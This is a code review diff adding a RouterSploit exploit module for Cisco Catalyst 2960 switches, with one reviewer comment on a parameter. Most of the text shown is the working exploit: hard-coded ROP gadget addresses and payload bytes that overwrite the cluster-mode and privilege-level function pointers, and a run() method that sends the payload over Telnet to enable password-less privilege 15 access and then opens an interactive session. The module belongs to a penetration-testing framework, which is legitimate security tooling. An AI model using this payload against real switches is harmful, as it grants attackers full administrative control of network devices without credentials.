routersploit/modules/exploits/cisco/catalyst_2960_rocem.py

```diff
@@ -0,0 +1,227 @@
+                "FFFF" +
+                # +16(+0) r1 points here at fourth gadget
+                "GGGG" +
+                # +20(+4) fourth gadget address 0x006cb3a0: lwz r31, 8(r1); lwz r30, 0xc(r1); addi r1, r1, 0x10; lwz r0, 4(r1); mtlr r0; blr;
+                "\x00\x6c\xb3\xa0" +
+                "{FUNC_PRIVILEGE_LEVEL}" +
+                # +12
+                "HHHH" +
+                # +16(+0) r1 points here at fifth gadget
+                "IIII" +
+                # +20(+4) fifth gadget address 0x0148e560: stw r31, 0(r3); lwz r0, 0x14(r1); mtlr r0; lwz r31, 0xc(r1); addi r1, r1, 0x10; blr;
+                "\x01\x4a\xcf\x98" +
+                # +8 r1 points here at third gadget
+                "JJJJ" +
+                # +12
+                "KKKK" +
+                # +16
+                "LLLL" +
+                # +20 original execution flow return addr
+                "\x01\x14\xe7\xec" +
+                ":15:" + "\xff\xf0"
+            ),
+            "func_is_cluster_mode": (
+                # +12 set  address of func that rets 1
+                "\x00\x00\x99\x9c",
+                # unset
+                "\x00\x04\xeA\xe0"
+            ),
+            "func_privilege_level": (
+                # +8 address of the replacing function that returns 15 (our desired privilege level). 0x00270b94: li r3, 0xf; blr;
+                "\x00\x27\x0b\x94",
+                # unset
+                "\x00\x04\xe7\x78"
+            )
+        }
+    ]
+
+    def run(self):
+        if int(self.device) < 0 or int(self.device) >= len(self.payloads):
+            print_error("Set target device - use \"show devices\" and \"set device <id>\"")
+            return
+
+        print_status("Trying to connect to Telnet service on port {}".format(self.port))
+
+        try:
+            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+            s.connect((self.target, int(self.port)))
+
+            print_status("Connection OK")
+            print_status("Received bytes from telnet service: {}".format(repr(s.recv(1024))))
+        except:
+            print_error("Connection failed")
+            return
+
+        print_status("Building payload...")
+        payload = self.build_payload(int(self.device))
+
+        if self.action == 'set':
+            print_status("Setting credless privilege 15 authentication")
+        else:
+            print_status("Unsetting credless privilege 15 authentication")
+
+        print_status("Sending cluster option")
+        s.send(payload)
+        s.close()
+
+        print_status("Payload sent")
+
+        if self.action == 'set':
+            print_status("Connecting to Telnet service...")
+            try:
+                t = telnetlib.Telnet(self.target, int(self.port))
+                t.interact()
+            except:
+                print_error("Exploit failed")
+        else:
+            print_status("Check if Telnet authentication was set back")
+
+    def build_payload(self, device):
```

Comment:
We can access this using `self.device`. Is there any reason why we passing this explicitly?